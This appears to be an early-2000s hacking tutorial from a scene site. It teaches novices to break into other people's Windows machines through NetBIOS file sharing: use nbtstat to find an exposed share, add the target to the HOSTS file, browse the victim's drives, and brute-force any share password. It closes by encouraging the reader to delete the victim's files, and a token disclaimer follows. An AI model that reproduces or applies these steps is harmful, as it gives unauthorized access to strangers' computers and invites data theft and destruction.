|
iceberg_slim writes: by Iceberg Slim
This tutorial is intended for novice or intermediate computer users looking
to exploit Microsoft printer and file sharing, also known as netbios (network
basic input/output system). This tutorial will cover the steps in exploiting
netbios if your using windows 9x or windows 2000/XP. To keep the interest of
the reader and dumb people who cant understand text, screen shots will also
be shown for every step in the procedure. Each step will show procedures in
windows 9x and windows 2000. The assumption that you know basic DOS commands
and the function of IP addresses and file sharing is recommended. You will
not need any extra tools, they are all provided with a default windows
installation.
Steps
1. Check if IP or host has netbios enabled
2. Input IP and relating sharename into HOSTS file
3. Find computer
4. If share is password protected, use resources to get around protection.
5. 0wn the b0x!
1. Before even trying anything with netbios, you must have netbios enabled
and you must have file sharing enabled. First we must determine if the remote
computer has netbios enabled, because without netbios being enabled on your
computer and the remote computer, none of the following will be able to
happen. To check the remote computers netbios status, DOS has a utility just
for that, NBTSTAT.EXE
In win9x/ME, it's located at \windows
In windows 2000/XP, it's located at \winnt\system32
Nbtstat is run from the DOS prompt only, just open a DOS prompt and type in
"nbtstat", no quotes, but to find out if the remote computer is
exploitable and if we can access it, we use a certain nbtstat command,
"nbtstat -A ip address",no quotes.
If the command returns an output of "host not found", either the
remote computer does not have file sharing enabled or the host is not
responding to that command. But if the command returns a list, then the
command was successful and netbios is enabled. success here
The listing you now get might be confusing but we are only really looking for
a certain thing here. The <20> shows that the remote computer has file
sharing enabled among other things. Other services listed might be the
messenger service and the name of the currently logged on user. The name in
front of the <20> is the sharename; this is basically what is needed to
now gain access to the computer.
2. Now that we have the IP and the sharename of the computer, we can now move
on to putting those into the HOSTS file. The HOSTS file is a file that
windows looks at when it does any network translations from IP to netbios
name and vice versa. Windows will always look at the HOSTS file before it
looks any where else to translate, if windows finds the IP and netbios name
its looking for, it doesn't go searching anywhere else like a central server.
The HOSTS file has no file extension in windows; its simply just called
"HOSTS".
in 9x/ME, its located at \WINDOWS
in 2000/XP, its located at \WINDOWS\system32\drivers\etc
Don't freak out if its not found because on a default installation of
windows, there is no HOSTS file, you have to make one. It's very easy, just
browse to the directory of where its supposed to be located and right click
and go to new > text document, save it in the directory as
"HOSTS", no quotes, now you have a HOSTS file. Make sure the file
does not have a ".txt" extension, remember that the file just needs
to be named "HOSTS". Windows may ask you to confirm that you want
to have the file with no extension, this is ok and correct. Now go back and
get the IP and sharename you just found, insert the IP first and then a space
and insert the sharename. as shown here in this screenshot.
After the IP and sharename are in the HOSTS file, click file > save. Now
it's time to see if we can actually get in.
3. On win9x/me systems go to start > search > find computer. On windows
2000 its the same, but for XP you go to start > search > file or
folders, then click the label on the left hand side called "computers or
people". Enter the IP of the remote computer and search for it, it
should show up on the list and you double click the computer to access its
shares. Shown here.
If a box pops up and asks for a password, then you can use a program called
pqwack to brute force the password, it may take time to break the password.
But mostly you will not encounter a password box; I personally have only
encountered 1 out of dozens. Now you can browse freely the shared hard drive
or share. When browsing, it's very slow, because of latency and windows has a
flaw with task schedule it slows down network browsing when using netbios,
task schedule checks the remote computer for any tasks at hand. Just let
windows explorer take the information off of the remote computer, it may take
time, but it's very easy now to see what's on the remote computer. On some
windows 2000 and windows NT systems, certain directories are not accessible
due to restrictions to browsing local directories, you may try to open the
windows directory and get a box saying that the directory is off limits and
due to administrator restrictions you cannot open the directory.
the ENTIRE C drive is shared to the internet!
So now you have pretty much owned the box and can do anything. Deltree it and
see if I care. Peace.
Iceberg Slim does not condone nor endorse malicious intent derived from this
material. User discretion is advised.
Salutations = everyone and anyone @ www.fromadia.com , drew, bakesnake, the
big bad tunafish, squire James (Just cause he propped me in his writing),
sc00by_f00, aj, stroker, ETC ETC, too long to list.
(c) New Order /
http://neworder.box.sk/
|